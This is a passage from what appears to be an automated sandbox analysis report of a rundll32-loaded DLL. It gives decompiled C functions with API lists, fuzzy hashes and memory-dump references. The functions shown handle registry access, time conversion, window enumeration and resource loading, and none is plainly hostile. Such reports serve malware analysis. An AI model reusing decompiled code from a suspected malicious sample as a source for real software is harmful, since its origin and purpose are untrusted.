						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}

APIs

RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
RegCloseKey.ADVAPI32(?), ref: 10034BDC
RegCloseKey.ADVAPI32(00000000), ref: 10034BF2

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID:
API String ID: 1607946009-0
Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21

Uniqueness

Uniqueness Score: -1.00%

Function 10026A96 Relevance: 6.1, APIs: 4, Instructions: 67
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v44;
				void* __ebp;
				int _t23;
				int _t26;
				int _t29;
				int _t31;
				void* _t40;
				void* _t56;
				void* _t59;

				_t47 = __edx;
				_t40 = __ecx;
				_t56 = _t59;
				if(_a8 != 0) {
					_t52 = _a4;
					_v28.wYear = E10010297(__eflags);
					_v28.wMonth = E100102AE(__eflags);
					_t23 = E100134E7(_a4, __edx, _a4);
					__eflags = _t23;
					if(__eflags == 0) {
						_v28.wDay = 0;
					} else {
						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
					}
					_v28.wHour = E100102C1(__eflags);
					_v28.wMinute = E100102D4(__eflags);
					_t26 = E100134E7(_t52, _t47, _t52);
					__eflags = _t26;
					if(_t26 == 0) {
						_t14 =  &(_v28.wSecond);
						 *_t14 = _v28.wSecond | 0x0000ffff;
						__eflags =  *_t14;
					} else {
						_v28.wSecond =  *_t26;
					}
					_v28.wMilliseconds = 0;
					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
					__eflags = _t29;
					if(_t29 == 0) {
						E100271C6(_t56, GetLastError(), 0);
					}
					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
					__eflags = _t31;
					if(_t31 == 0) {
						_t31 = E100271C6(_t56, GetLastError(), 0);
					}
					return _t31;
				} else {
					_push(_t56);
					_push(__ecx);
					_v44 = 0x1004d548;
					E10011C0F( &_v44, 0x10045e48);
					asm("int3");
					return  *((intOrPtr*)(_t40 + 0x70));
				}
			}

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
GetLastError.KERNEL32(00000000), ref: 10026B29
LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
GetLastError.KERNEL32(00000000), ref: 10026B43

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 1000D0B9 Relevance: 6.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E1000D03C( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L1000C8E6( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}

APIs

SafeArrayDestroy.OLEAUT32 ref: 1000D0D8
CoTaskMemFree.OLE32(?), ref: 1000D154

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100306DB Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t35;
				int _t39;
				void* _t49;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t39, _t21);
				OffsetRect(_t49 + 0x48, _t39, _v8);
				OffsetRect(_t49 + 0x38, _t39, _v8);
				OffsetRect(_t49 + 0x58, _t39, _v8);
				_t51 =  *((intOrPtr*)(_t49 + 0x80));
				 *((intOrPtr*)(_t49 + 4)) = _a4;
				 *((intOrPtr*)(_t49 + 8)) = _a8;
				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
					_t35 = E100301DC();
				} else {
					_t35 = 0;
				}
				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
				return E10030582(_t49, _t51, 0);
			}

APIs

OffsetRect.USER32(?,?,?), ref: 10030704
OffsetRect.USER32(?,?,?), ref: 1003070F
OffsetRect.USER32(?,?,?), ref: 1003071A
OffsetRect.USER32(?,?,?), ref: 10030725

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60

Uniqueness

Uniqueness Score: -1.00%

Function 1001EFFC Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001EFFC(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E100373B5() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
LoadResource.KERNEL32(?,00000000), ref: 1001F02A
LockResource.KERNEL32(00000000), ref: 1001F03C
FreeResource.KERNEL32(00000000), ref: 1001F086

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100257A8 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E100257A8(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t9;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t35;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E1001F77E(0x10);
				_t36 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10025742(_t9, _t36, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
DuplicateHandle.KERNEL32(00000000), ref: 100257E5
GetLastError.KERNEL32(?), ref: 10025800

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 1001D8A6 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t20;
				struct HWND__* _t21;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t20 = GetParent(_t24);
					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t21 = E10029C98(_t24, _v12.x, _v12.y);
						if(_t21 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t21);
							_t9 = _t21;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t20;
					}
				}
				return _t9;
			}

APIs

WindowFromPoint.USER32(?,?), ref: 1001D8BD
GetParent.USER32(00000000), ref: 1001D8CB
ScreenToClient.USER32 ref: 1001D8EC
IsWindowEnabled.USER32(00000000), ref: 1001D905

Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ClientEnabledFromLongParentPointScreen
String ID:
API String ID: 2204725058-0
Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10022B16 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E10022115();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E1002283F();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(?), ref: 10022B24
GetTopWindow.USER32(00000000), ref: 10022B63
GetWindow.USER32(00000000,00000002), ref: 10022B81

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10022422 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t13;
				struct HWND__* _t15;
				struct HWND__* _t16;
				void* _t17;

				_t13 = __ecx;
				_t15 = GetDlgItem(_a4, _a8);
				if(_t15 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t16 = _t10;
						if(_t16 == 0) {
							goto L10;
						}
						_t10 = E10022422(_t13, _t16, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t16, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t15) == 0) {
						L3:
						_push(_t15);
						if(_a12 == 0) {
							return E100220EE(_t17);
						}
						_t10 = E10022115();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10022422(_t13, _t15, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 1002242D
GetTopWindow.USER32(00000000), ref: 10022440

Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487

GetTopWindow.USER32(?), ref: 10022470

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691

Uniqueness

Uniqueness Score: -1.00%

Function 1002B47F Relevance: 6.0, APIs: 4, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x1004c470; // 0x12db9c4b
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, 0x1003cc28, _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E10035959(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E100117AE(_t19, _v8);
			}

0x1002b485
0x1002b48b
0x1002b491
0x1002b494
0x1002b4d8
0x1002b4ee
0x1002b496
0x1002b49e
0x1002b4a2
0x1002b4b3
0x1002b4bc
0x1002b4c6
0x1002b4c9
0x1002b4a2
0x1002b4fe

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
wsprintfA.USER32 ref: 1002B4D8
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90

Uniqueness

Uniqueness Score: -1.00%

Function 10031D85 Relevance: 6.0, APIs: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v268;
				int _v272;
				void* __ebp;
				intOrPtr _t14;
				int _t24;
				intOrPtr* _t30;
				void* _t33;

				_t14 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t14;
				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
				_t24 = 0;
				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t30 =  *((intOrPtr*)(E100373B5() + 4));
				if(_v272 > 0) {
					do {
						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
						_t24 = _t24 + 1;
					} while (_t24 < _v272);
				}
				DragFinish(_a4);
				return E100117AE(_t18, _v8);
			}

0x10031d8e
0x10031d99
0x10031da3
0x10031dae
0x10031db9
0x10031dca
0x10031dcd
0x10031dcf
0x10031ddf
0x10031dec
0x10031df2
0x10031df3
0x10031dcf
0x10031dfe
0x10031e10

APIs

SetActiveWindow.USER32(?), ref: 10031D9C
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
DragFinish.SHELL32(?), ref: 10031DFE

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100368F3 Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
